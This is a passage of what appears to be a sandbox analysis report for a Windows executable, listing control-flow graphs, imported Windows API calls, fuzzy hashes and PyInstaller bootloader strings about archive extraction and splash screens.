                                                                                                                                                                                                                                control_flow_graph 0 7ff6aae21000-7ff6aae23806 call 7ff6aae2fe18 call 7ff6aae2fe20 call 7ff6aae2c850 call 7ff6aae353f0 call 7ff6aae35484 call 7ff6aae236b0 14 7ff6aae23808-7ff6aae2380f 0->14 15 7ff6aae23814-7ff6aae23836 call 7ff6aae21950 0->15 16 7ff6aae23c97-7ff6aae23cb2 call 7ff6aae2c550 14->16 20 7ff6aae2391b-7ff6aae23931 call 7ff6aae245c0 15->20 21 7ff6aae2383c-7ff6aae23856 call 7ff6aae21c80 15->21 27 7ff6aae2396a-7ff6aae2397f call 7ff6aae22710 20->27 28 7ff6aae23933-7ff6aae23960 call 7ff6aae27f90 20->28 25 7ff6aae2385b-7ff6aae2389b call 7ff6aae28830 21->25 35 7ff6aae2389d-7ff6aae238a3 25->35 36 7ff6aae238c1-7ff6aae238cc call 7ff6aae34f30 25->36 40 7ff6aae23c8f 27->40 38 7ff6aae23962-7ff6aae23965 call 7ff6aae3004c 28->38 39 7ff6aae23984-7ff6aae239a6 call 7ff6aae21c80 28->39 41 7ff6aae238af-7ff6aae238bd call 7ff6aae289a0 35->41 42 7ff6aae238a5-7ff6aae238ad 35->42 47 7ff6aae239fc-7ff6aae23a2a call 7ff6aae28940 call 7ff6aae289a0 * 3 36->47 48 7ff6aae238d2-7ff6aae238e1 call 7ff6aae28830 36->48 38->27 53 7ff6aae239b0-7ff6aae239b9 39->53 40->16 41->36 42->41 76 7ff6aae23a2f-7ff6aae23a3e call 7ff6aae28830 47->76 57 7ff6aae238e7-7ff6aae238ed 48->57 58 7ff6aae239f4-7ff6aae239f7 call 7ff6aae34f30 48->58 53->53 56 7ff6aae239bb-7ff6aae239d8 call 7ff6aae21950 53->56 56->25 68 7ff6aae239de-7ff6aae239ef call 7ff6aae22710 56->68 62 7ff6aae238f0-7ff6aae238fc 57->62 58->47 65 7ff6aae238fe-7ff6aae23903 62->65 66 7ff6aae23905-7ff6aae23908 62->66 65->62 65->66 66->58 70 7ff6aae2390e-7ff6aae23916 call 7ff6aae34f30 66->70 68->40 70->76 79 7ff6aae23b45-7ff6aae23b53 76->79 80 7ff6aae23a44-7ff6aae23a47 76->80 82 7ff6aae23a67 79->82 83 7ff6aae23b59-7ff6aae23b5d 79->83 80->79 81 7ff6aae23a4d-7ff6aae23a50 80->81 84 7ff6aae23a56-7ff6aae23a5a 81->84 85 7ff6aae23b14-7ff6aae23b17 81->85 86 7ff6aae23a6b-7ff6aae23a90 call 7ff6aae34f30 82->86 83->86 84->85 87 7ff6aae23a60 84->87 88 7ff6aae23b19-7ff6aae23b1d 85->88 89 7ff6aae23b2f-7ff6aae23b40 call 7ff6aae22710 85->89 95 7ff6aae23aab-7ff6aae23ac0 86->95 96 7ff6aae23a92-7ff6aae23aa6 call 7ff6aae28940 86->96 87->82 88->89 91 7ff6aae23b1f-7ff6aae23b2a 88->91 97 7ff6aae23c7f-7ff6aae23c87 89->97 91->86 99 7ff6aae23ac6-7ff6aae23aca 95->99 100 7ff6aae23be8-7ff6aae23bfa call 7ff6aae28830 95->100 96->95 97->40 102 7ff6aae23bcd-7ff6aae23be2 call 7ff6aae21940 99->102 103 7ff6aae23ad0-7ff6aae23ae8 call 7ff6aae35250 99->103 108 7ff6aae23bfc-7ff6aae23c02 100->108 109 7ff6aae23c2e 100->109 102->99 102->100 114 7ff6aae23aea-7ff6aae23b02 call 7ff6aae35250 103->114 115 7ff6aae23b62-7ff6aae23b7a call 7ff6aae35250 103->115 112 7ff6aae23c1e-7ff6aae23c2c 108->112 113 7ff6aae23c04-7ff6aae23c1c 108->113 111 7ff6aae23c31-7ff6aae23c40 call 7ff6aae34f30 109->111 123 7ff6aae23c46-7ff6aae23c4a 111->123 124 7ff6aae23d41-7ff6aae23d63 call 7ff6aae244e0 111->124 112->111 113->111 114->102 122 7ff6aae23b08-7ff6aae23b0f 114->122 125 7ff6aae23b87-7ff6aae23b9f call 7ff6aae35250 115->125 126 7ff6aae23b7c-7ff6aae23b80 115->126 122->102 127 7ff6aae23c50-7ff6aae23c5f call 7ff6aae290e0 123->127 128 7ff6aae23cd4-7ff6aae23ce6 call 7ff6aae28830 123->128 139 7ff6aae23d71-7ff6aae23d82 call 7ff6aae21c80 124->139 140 7ff6aae23d65-7ff6aae23d6f call 7ff6aae24630 124->140 135 7ff6aae23bac-7ff6aae23bc4 call 7ff6aae35250 125->135 136 7ff6aae23ba1-7ff6aae23ba5 125->136 126->125 142 7ff6aae23c61 127->142 143 7ff6aae23cb3-7ff6aae23cbd call 7ff6aae28660 127->143 144 7ff6aae23ce8-7ff6aae23ceb 128->144 145 7ff6aae23d35-7ff6aae23d3c 128->145 135->102 155 7ff6aae23bc6 135->155 136->135 153 7ff6aae23d87-7ff6aae23d96 139->153 140->153 150 7ff6aae23c68 call 7ff6aae22710 142->150 161 7ff6aae23cc8-7ff6aae23ccf 143->161 162 7ff6aae23cbf-7ff6aae23cc6 143->162 144->145 151 7ff6aae23ced-7ff6aae23d10 call 7ff6aae21c80 144->151 145->150 163 7ff6aae23c6d-7ff6aae23c77 150->163 168 7ff6aae23d2b-7ff6aae23d33 call 7ff6aae34f30 151->168 169 7ff6aae23d12-7ff6aae23d26 call 7ff6aae22710 call 7ff6aae34f30 151->169 158 7ff6aae23d98-7ff6aae23d9f 153->158 159 7ff6aae23dbc-7ff6aae23dd2 call 7ff6aae29390 153->159 155->102 158->159 165 7ff6aae23da1-7ff6aae23da5 158->165 171 7ff6aae23de0-7ff6aae23dfc SetDllDirectoryW 159->171 172 7ff6aae23dd4 159->172 161->153 162->150 163->97 165->159 166 7ff6aae23da7-7ff6aae23db6 LoadLibraryExW 165->166 166->159 168->153 169->163 175 7ff6aae23ef9-7ff6aae23f00 171->175 176 7ff6aae23e02-7ff6aae23e11 call 7ff6aae28830 171->176 172->171 178 7ff6aae23f06-7ff6aae23f0d 175->178 179 7ff6aae24000-7ff6aae24008 175->179 189 7ff6aae23e2a-7ff6aae23e34 call 7ff6aae34f30 176->189 190 7ff6aae23e13-7ff6aae23e19 176->190 178->179 183 7ff6aae23f13-7ff6aae23f1d call 7ff6aae233c0 178->183 184 7ff6aae2400a-7ff6aae24027 PostMessageW GetMessageW 179->184 185 7ff6aae2402d-7ff6aae24038 call 7ff6aae236a0 call 7ff6aae23360 179->185 183->163 196 7ff6aae23f23-7ff6aae23f37 call 7ff6aae290c0 183->196 184->185 202 7ff6aae2403d-7ff6aae2405f call 7ff6aae23670 call 7ff6aae26fc0 call 7ff6aae26d70 185->202 199 7ff6aae23eea-7ff6aae23ef4 call 7ff6aae28940 189->199 200 7ff6aae23e3a-7ff6aae23e40 189->200 193 7ff6aae23e1b-7ff6aae23e23 190->193 194 7ff6aae23e25-7ff6aae23e27 190->194 193->194 194->189 209 7ff6aae23f39-7ff6aae23f56 PostMessageW GetMessageW 196->209 210 7ff6aae23f5c-7ff6aae23f9f call 7ff6aae28940 call 7ff6aae289e0 call 7ff6aae26fc0 call 7ff6aae26d70 call 7ff6aae288e0 196->210 199->175 200->199 204 7ff6aae23e46-7ff6aae23e4c 200->204 207 7ff6aae23e57-7ff6aae23e59 204->207 208 7ff6aae23e4e-7ff6aae23e50 204->208 207->175 212 7ff6aae23e5f-7ff6aae23e7b call 7ff6aae26dc0 call 7ff6aae27340 207->212 208->212 213 7ff6aae23e52 208->213 209->210 248 7ff6aae23fed-7ff6aae23ffb call 7ff6aae21900 210->248 249 7ff6aae23fa1-7ff6aae23fb7 call 7ff6aae28ed0 call 7ff6aae288e0 210->249 228 7ff6aae23e86-7ff6aae23e8d 212->228 229 7ff6aae23e7d-7ff6aae23e84 212->229 213->175 232 7ff6aae23ea7-7ff6aae23eb1 call 7ff6aae271b0 228->232 233 7ff6aae23e8f-7ff6aae23e9c call 7ff6aae26e00 228->233 231 7ff6aae23ed3-7ff6aae23ee8 call 7ff6aae22a50 call 7ff6aae26fc0 call 7ff6aae26d70 229->231 231->175 242 7ff6aae23ebc-7ff6aae23eca call 7ff6aae274f0 232->242 243 7ff6aae23eb3-7ff6aae23eba 232->243 233->232 246 7ff6aae23e9e-7ff6aae23ea5 233->246 242->175 256 7ff6aae23ecc 242->256 243->231 246->231 248->163 249->248 261 7ff6aae23fb9-7ff6aae23fce 249->261 256->231 262 7ff6aae23fe8 call 7ff6aae22a50 261->262 263 7ff6aae23fd0-7ff6aae23fe3 call 7ff6aae22710 call 7ff6aae21900 261->263 262->248 263->163
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                • Opcode ID: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                • Instruction ID: 2ed852f348e4d7a50afa9d34b83816faacc4a3152e6a9a991ca1e42653f8ef3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF325731A0A683D1FE29BF2194552B966A1BF84780F8440F3DA4DC3296EF3CE55EE710

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 467 7ff6aae46964-7ff6aae469d7 call 7ff6aae46698 470 7ff6aae469d9-7ff6aae469e2 call 7ff6aae34ee8 467->470 471 7ff6aae469f1-7ff6aae469fb call 7ff6aae38520 467->471 476 7ff6aae469e5-7ff6aae469ec call 7ff6aae34f08 470->476 477 7ff6aae46a16-7ff6aae46a7f CreateFileW 471->477 478 7ff6aae469fd-7ff6aae46a14 call 7ff6aae34ee8 call 7ff6aae34f08 471->478 490 7ff6aae46d32-7ff6aae46d52 476->490 481 7ff6aae46afc-7ff6aae46b07 GetFileType 477->481 482 7ff6aae46a81-7ff6aae46a87 477->482 478->476 484 7ff6aae46b09-7ff6aae46b44 GetLastError call 7ff6aae34e7c CloseHandle 481->484 485 7ff6aae46b5a-7ff6aae46b61 481->485 487 7ff6aae46ac9-7ff6aae46af7 GetLastError call 7ff6aae34e7c 482->487 488 7ff6aae46a89-7ff6aae46a8d 482->488 484->476 501 7ff6aae46b4a-7ff6aae46b55 call 7ff6aae34f08 484->501 493 7ff6aae46b69-7ff6aae46b6c 485->493 494 7ff6aae46b63-7ff6aae46b67 485->494 487->476 488->487 495 7ff6aae46a8f-7ff6aae46ac7 CreateFileW 488->495 499 7ff6aae46b72-7ff6aae46bc7 call 7ff6aae38438 493->499 500 7ff6aae46b6e 493->500 494->499 495->481 495->487 505 7ff6aae46bc9-7ff6aae46bd5 call 7ff6aae468a0 499->505 506 7ff6aae46be6-7ff6aae46c17 call 7ff6aae46418 499->506 500->499 501->476 505->506 512 7ff6aae46bd7 505->512 513 7ff6aae46c19-7ff6aae46c1b 506->513 514 7ff6aae46c1d-7ff6aae46c5f 506->514 515 7ff6aae46bd9-7ff6aae46be1 call 7ff6aae3aac0 512->515 513->515 516 7ff6aae46c81-7ff6aae46c8c 514->516 517 7ff6aae46c61-7ff6aae46c65 514->517 515->490 518 7ff6aae46d30 516->518 519 7ff6aae46c92-7ff6aae46c96 516->519 517->516 521 7ff6aae46c67-7ff6aae46c7c 517->521 518->490 519->518 522 7ff6aae46c9c-7ff6aae46ce1 CloseHandle CreateFileW 519->522 521->516 524 7ff6aae46d16-7ff6aae46d2b 522->524 525 7ff6aae46ce3-7ff6aae46d11 GetLastError call 7ff6aae34e7c call 7ff6aae38660 522->525 524->518 525->524
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction ID: e22a441afecb09796a032c7834d33beea07954e64edb72f4c3310340a0f3e353
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC1DF32B29A41C6EB10EF69C4902AC7765FB49B98F014276DE5E9B7E4CF39E452D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction ID: cada24142b017985374201d36ff8de6408adedd1756f44b18589657d24552d4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBF0C832A1A742C6FB609F64B4987667390BB84364F041376D9AD426D4DF3CE44EDA00

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 269 7ff6aae21950-7ff6aae2198b call 7ff6aae245c0 272 7ff6aae21c4e-7ff6aae21c72 call 7ff6aae2c550 269->272 273 7ff6aae21991-7ff6aae219d1 call 7ff6aae27f90 269->273 278 7ff6aae219d7-7ff6aae219e7 call 7ff6aae306d4 273->278 279 7ff6aae21c3b-7ff6aae21c3e call 7ff6aae3004c 273->279 284 7ff6aae219e9-7ff6aae21a03 call 7ff6aae34f08 call 7ff6aae22910 278->284 285 7ff6aae21a08-7ff6aae21a24 call 7ff6aae3039c 278->285 283 7ff6aae21c43-7ff6aae21c4b 279->283 283->272 284->279 291 7ff6aae21a26-7ff6aae21a40 call 7ff6aae34f08 call 7ff6aae22910 285->291 292 7ff6aae21a45-7ff6aae21a5a call 7ff6aae34f28 285->292 291->279 299 7ff6aae21a7b-7ff6aae21b05 call 7ff6aae21c80 * 2 call 7ff6aae306d4 call 7ff6aae34f44 292->299 300 7ff6aae21a5c-7ff6aae21a76 call 7ff6aae34f08 call 7ff6aae22910 292->300 313 7ff6aae21b0a-7ff6aae21b14 299->313 300->279 314 7ff6aae21b16-7ff6aae21b30 call 7ff6aae34f08 call 7ff6aae22910 313->314 315 7ff6aae21b35-7ff6aae21b4e call 7ff6aae3039c 313->315 314->279 320 7ff6aae21b6f-7ff6aae21b8b call 7ff6aae30110 315->320 321 7ff6aae21b50-7ff6aae21b6a call 7ff6aae34f08 call 7ff6aae22910 315->321 329 7ff6aae21b8d-7ff6aae21b99 call 7ff6aae22710 320->329 330 7ff6aae21b9e-7ff6aae21bac 320->330 321->279 329->279 330->279 331 7ff6aae21bb2-7ff6aae21bb9 330->331 334 7ff6aae21bc1-7ff6aae21bc7 331->334 336 7ff6aae21bc9-7ff6aae21bd6 334->336 337 7ff6aae21be0-7ff6aae21bef 334->337 338 7ff6aae21bf1-7ff6aae21bfa 336->338 337->337 337->338 339 7ff6aae21bfc-7ff6aae21bff 338->339 340 7ff6aae21c0f 338->340 339->340 341 7ff6aae21c01-7ff6aae21c04 339->341 342 7ff6aae21c11-7ff6aae21c24 340->342 341->340 343 7ff6aae21c06-7ff6aae21c09 341->343 344 7ff6aae21c26 342->344 345 7ff6aae21c2d-7ff6aae21c39 342->345 343->340 346 7ff6aae21c0b-7ff6aae21c0d 343->346 344->345 345->279 345->334 346->342
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE27F90: _fread_nolock.LIBCMT ref: 00007FF6AAE2803A
                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6AAE21A1B
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6AAE21B6A), ref: 00007FF6AAE2295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                • Opcode ID: ed5d37bd12c92faad5b6bf746ee66ab535d4fcd70a2e81ebf99a2f5a44e873f3
                                                                                                                                                                                                                                • Instruction ID: af9e67d23f1b57bceb91ad9297cccecb1b99c3d2377079c4ac158f1b1c20cbf0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed5d37bd12c92faad5b6bf746ee66ab535d4fcd70a2e81ebf99a2f5a44e873f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC819071A0A687C6EB64FF24D0412B963A0BF88784F4444B3D98DC7795DE3CE68BA750

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: 63c68e8786c2abf00790aed082817e0e68851266c528218f2f0b63e7b600aa09
                                                                                                                                                                                                                                • Instruction ID: 5566bef7e9a3bce9c6698a554390525de311a6cc7754aac591736830673e3990
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63c68e8786c2abf00790aed082817e0e68851266c528218f2f0b63e7b600aa09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7415932A4A647C6EE10FF21D4005B9A390BF44794F4845F3EE4D97AA9DE3CE60BA700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 530 7ff6aae21210-7ff6aae2126d call 7ff6aae2bd80 533 7ff6aae21297-7ff6aae212af call 7ff6aae34f44 530->533 534 7ff6aae2126f-7ff6aae21296 call 7ff6aae22710 530->534 539 7ff6aae212b1-7ff6aae212cf call 7ff6aae34f08 call 7ff6aae22910 533->539 540 7ff6aae212d4-7ff6aae212e4 call 7ff6aae34f44 533->540 551 7ff6aae21439-7ff6aae2146d call 7ff6aae2ba60 call 7ff6aae34f30 * 2 539->551 546 7ff6aae212e6-7ff6aae21304 call 7ff6aae34f08 call 7ff6aae22910 540->546 547 7ff6aae21309-7ff6aae2131b 540->547 546->551 550 7ff6aae21320-7ff6aae21345 call 7ff6aae3039c 547->550 559 7ff6aae2134b-7ff6aae21355 call 7ff6aae30110 550->559 560 7ff6aae21431 550->560 559->560 566 7ff6aae2135b-7ff6aae21367 559->566 560->551 568 7ff6aae21370-7ff6aae21398 call 7ff6aae2a1c0 566->568 571 7ff6aae21416-7ff6aae2142c call 7ff6aae22710 568->571 572 7ff6aae2139a-7ff6aae2139d 568->572 571->560 573 7ff6aae2139f-7ff6aae213a9 572->573 574 7ff6aae21411 572->574 576 7ff6aae213ab-7ff6aae213b9 call 7ff6aae30adc 573->576 577 7ff6aae213d4-7ff6aae213d7 573->577 574->571 583 7ff6aae213be-7ff6aae213c1 576->583 579 7ff6aae213d9-7ff6aae213e7 call 7ff6aae49e30 577->579 580 7ff6aae213ea-7ff6aae213ef 577->580 579->580 580->568 582 7ff6aae213f5-7ff6aae213f8 580->582 585 7ff6aae213fa-7ff6aae213fd 582->585 586 7ff6aae2140c-7ff6aae2140f 582->586 587 7ff6aae213cf-7ff6aae213d2 583->587 588 7ff6aae213c3-7ff6aae213cd call 7ff6aae30110 583->588 585->571 589 7ff6aae213ff-7ff6aae21407 585->589 586->560 587->571 588->580 588->587 589->550
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                • Opcode ID: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
                                                                                                                                                                                                                                • Instruction ID: 54c2288ff393d4a3b87b37caae2bb191664513216d900af6aee44a866fee743d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
